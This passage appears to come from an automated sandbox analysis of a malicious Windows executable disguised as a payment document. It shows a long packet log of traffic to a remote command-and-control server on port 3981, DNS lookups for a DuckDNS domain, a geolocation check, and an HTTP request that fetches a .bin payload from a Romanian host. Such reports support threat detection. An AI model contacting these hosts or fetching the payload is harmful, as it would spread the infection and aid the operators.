                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.885157108 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.885262966 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.885380030 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.885472059 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.885642052 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.886179924 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.886331081 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.886439085 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.886501074 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.886617899 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.886626959 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.886742115 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.886801004 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.886836052 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.886953115 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.886966944 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887079954 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887137890 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887212038 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887296915 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887437105 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887480021 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887552977 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887646914 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887648106 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887765884 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887816906 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887816906 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887929916 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887986898 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888006926 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888119936 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888183117 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888235092 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888348103 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888354063 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888469934 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888520002 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888619900 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888689041 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888689041 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888698101 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888818026 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888835907 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888946056 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889013052 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889013052 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889058113 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889177084 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889180899 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889293909 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889349937 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889400959 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889517069 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889517069 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889525890 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889642954 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889689922 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889797926 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889857054 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889857054 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889870882 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889996052 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.890031099 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.890151978 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.890203953 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.890230894 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.890367031 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.890371084 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.890371084 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.890539885 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.890539885 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.434051037 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.434278011 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.574563026 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.574593067 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.574774027 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.574779034 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.574779034 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.574871063 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.574974060 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.574995041 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.575073957 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.575165033 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.575165033 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.575208902 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.575339079 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.575357914 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.575400114 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.575476885 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.575521946 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.575639963 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.575676918 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.575678110 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.575759888 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.575845957 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.575911045 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.576014996 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.576054096 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.576145887 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.576159000 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.576159000 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.576219082 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.576330900 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.576330900 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:25.576497078 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.121737957 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.121751070 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.121880054 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.121913910 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.121965885 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.122061014 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.122061014 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.122076035 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.122184992 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.122232914 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.122232914 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.122283936 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.122399092 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.122406960 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.122522116 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.122601986 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.122633934 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.122714043 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.122765064 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.122909069 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.171555996 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.662650108 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.662858009 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.668252945 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.668359041 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.668472052 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.668510914 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.668524981 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.668658972 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.668690920 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.668745041 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.668850899 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.668859959 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.668926001 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.668992043 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.669029951 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.669059038 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.669246912 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:26.669246912 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:29.347948074 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:29.347971916 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:29.348017931 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:29.894344091 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:29.894501925 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:29.894557953 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:29.894736052 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:29.894747972 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:29.894773960 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:29.894781113 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:29.895762920 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:30.441380978 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:30.441461086 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:30.457043886 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:30.457242012 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:30.997881889 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:30.998059034 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:31.544445992 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:36.745716095 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:36.748776913 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:37.337510109 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:14:06.775259972 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:14:06.777301073 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:14:07.366128922 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:14:36.803973913 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:14:36.806607008 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:14:37.394851923 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:15:01.838100910 CET4975080192.168.11.20178.237.33.50
                                                                                                                                                                                                                                    Jan 8, 2025 17:15:02.384746075 CET4975080192.168.11.20178.237.33.50
                                                                                                                                                                                                                                    Jan 8, 2025 17:15:03.462657928 CET4975080192.168.11.20178.237.33.50
                                                                                                                                                                                                                                    Jan 8, 2025 17:15:05.602828979 CET4975080192.168.11.20178.237.33.50
                                                                                                                                                                                                                                    Jan 8, 2025 17:15:06.833647966 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:15:06.835197926 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:15:07.423563957 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:15:09.867525101 CET4975080192.168.11.20178.237.33.50
                                                                                                                                                                                                                                    Jan 8, 2025 17:15:18.396899939 CET4975080192.168.11.20178.237.33.50
                                                                                                                                                                                                                                    Jan 8, 2025 17:15:35.455640078 CET4975080192.168.11.20178.237.33.50
                                                                                                                                                                                                                                    Jan 8, 2025 17:15:36.866481066 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:15:36.868056059 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:15:37.456412077 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:16:06.977757931 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:16:06.979686975 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:16:07.568000078 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:16:36.927393913 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:16:36.929805040 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:16:37.517059088 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:17:06.959630013 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:17:06.961354017 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:17:07.549362898 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:17:36.995198011 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:17:36.997176886 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:17:37.584182024 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:18:07.026336908 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:18:07.078686953 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:18:07.122087002 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:18:07.708060026 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:18:37.054759026 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:18:37.056418896 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:18:37.642831087 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:19:07.082339048 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:19:07.083571911 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:19:07.671482086 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:19:37.122301102 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:19:37.122737885 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:19:37.709307909 CET39814974843.226.229.196192.168.11.20

                                                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:11.879415989 CET5665153192.168.11.201.1.1.1
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:12.376782894 CET53566511.1.1.1192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:15.226377010 CET5264253192.168.11.201.1.1.1
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:15.873150110 CET53526421.1.1.1192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:19.285228014 CET5299453192.168.11.201.1.1.1
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:19.413477898 CET53529941.1.1.1192.168.11.20

                                                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:11.879415989 CET192.168.11.201.1.1.10x5a70Standard query (0)teldrum.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:15.226377010 CET192.168.11.201.1.1.10x564cStandard query (0)wealthabundance01.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:19.285228014 CET192.168.11.201.1.1.10xfad1Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:12.376782894 CET1.1.1.1192.168.11.200x5a70No error (0)teldrum.ro109.99.162.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:15.873150110 CET1.1.1.1192.168.11.200x564cNo error (0)wealthabundance01.duckdns.org43.226.229.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:19.413477898 CET1.1.1.1192.168.11.200xfad1No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                                                    • teldrum.ro
                                                                                                                                                                                                                                    • geoplugin.net

                                                                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    0192.168.11.2049750178.237.33.50805524C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:19.630399942 CET71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                                                                    Host: geoplugin.net
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:19.851737022 CET1171INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    date: Wed, 08 Jan 2025 16:13:19 GMT
                                                                                                                                                                                                                                    server: Apache
                                                                                                                                                                                                                                    content-length: 963
                                                                                                                                                                                                                                    content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                    cache-control: public, max-age=300
                                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 38 35 2e 32 34 36 2e 32 30 39 2e 31 35 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 43 68 69 63 61 67 6f 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 49 6c 6c 69 6e 6f 69 73 22 2c 0a 20 20 22 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: { "geoplugin_request":"185.246.209.154", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Chicago", "geoplugin_region":"Illinois", "geoplugin_regionCode":"IL", "geoplugin_regionName":"Illinois", "geoplugin_areaCode":"", "geoplugin_dmaCode":"602", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"41.871", "geoplugin_longitude":"-87.6289", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    0192.168.11.2049747109.99.162.144435524C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-08 16:13:13 UTC168OUTGET /PmprpeY34.bin HTTP/1.1
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                    Host: teldrum.ro
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-08 16:13:13 UTC223INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Wed, 08 Jan 2025 16:13:13 GMT
                                                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                                                    Last-Modified: Wed, 08 Jan 2025 05:44:12 GMT
